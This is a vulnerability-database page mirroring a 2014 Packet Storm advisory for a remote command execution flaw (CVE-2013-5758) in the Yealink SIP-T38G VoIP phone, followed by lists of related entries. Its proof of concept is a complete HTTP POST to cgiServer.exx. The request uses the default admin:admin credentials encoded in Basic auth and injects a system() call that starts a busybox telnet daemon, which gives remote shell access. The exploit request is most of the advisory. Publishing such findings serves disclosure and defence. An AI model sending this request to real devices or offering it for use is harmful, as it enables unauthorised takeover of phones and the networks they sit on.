Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMr.Un1k0d3rPACKETSTORM:127096
HistoryJun 13, 2014 - 12:00 a.m.

Yealink VoIP Phone SIP-T38G Remote Command Execution

2014-06-1300:00:00
Mr.Un1k0d3r
packetstormsecurity.com
25

0.048 Low

EPSS

Percentile

92.7%

JSON
`Title: Yealink VoIP Phone SIP-T38G Remote Command Execution  
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team  
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx  
Version: VoIP Phone SIP-T38G  
CVE: CVE-2013-5758  
  
Description:  
  
Using cgiServer.exx we are able to send OS command using the system  
function.  
  
POC:  
  
POST /cgi-bin/cgiServer.exx HTTP/1.1  
Host: 10.0.75.122  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Authorization: Basic YWRtaW46YWRtaW4= (Default Creds CVE-2013-5755)  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 0  
  
system("/bin/busybox%20telnetd%20start")  
  
  
  
--   
*Mr.Un1k0d3r** or 1 #*  
  
`

Related

seebug 3
exploitpack 3
exploitdb 3
zdt 1
openvas 1
cve 3
prion 3
nvd 3
cvelist 2
packetstorm 2
seebug
seebug
Yealink VoIP Phone SIP-T38G - Remote Command Execution
2014-07-01 00:00:00
Yealink VoIP Phone SIP-T38G - Default Credentials
2014-07-01 00:00:00
Yealink VoIP Phone SIP-T38G - Privileges Escalation
2014-07-01 00:00:00
exploitpack
exploitpack
Yealink VoIP Phone SIP-T38G - Remote Command Execution
2014-06-13 00:00:00
Yealink VoIP Phone SIP-T38G - Default Credentials
2014-06-13 00:00:00
Yealink VoIP Phone SIP-T38G - Privilege Escalation
2014-06-13 00:00:00
exploitdb
exploitdb
Yealink VoIP Phone SIP-T38G - Remote Command Execution
2014-06-13 00:00:00
Yealink VoIP Phone SIP-T38G - Default Credentials
2014-06-13 00:00:00
Yealink VoIP Phone SIP-T38G - Privilege Escalation
2014-06-13 00:00:00
zdt
zdt
Yealink VoIP Phone SIP-T38G - Multiple Vulnerabilities
2014-06-14 00:00:00
openvas
openvas
Yealink VoIP Phone SIP-T38G Multiple Vulnerabilities
2014-06-20 00:00:00
cve
cve
CVE-2013-5755
2014-07-16 14:19:02
CVE-2013-5758
2014-08-03 18:55:04
CVE-2013-5759
2014-08-03 18:55:04
prion
prion
Hardcoded credentials
2014-07-16 14:19:00
Cross site request forgery (csrf)
2014-08-03 18:55:00
Design/Logic Flaw
2014-08-03 18:55:00
nvd
nvd
CVE-2013-5755
2014-07-16 14:19:02
CVE-2013-5758
2014-08-03 18:55:04
CVE-2013-5759
2014-08-03 18:55:04
cvelist
cvelist
CVE-2013-5758
2014-08-03 18:00:00
CVE-2013-5755
2014-07-16 14:00:00
packetstorm
packetstorm
Yealink VoIP Phone SIP-T38G Default Credentials
2014-06-13 00:00:00
Yealink VoIP Phone SIP-T38G Privilege Escalation
2014-06-13 00:00:00

0.048 Low

EPSS

Percentile

92.7%

JSON
Related for PACKETSTORM:127096
seebug3exploitpack3exploitdb3zdt1openvas1cve3prion3nvd3cvelist2packetstorm2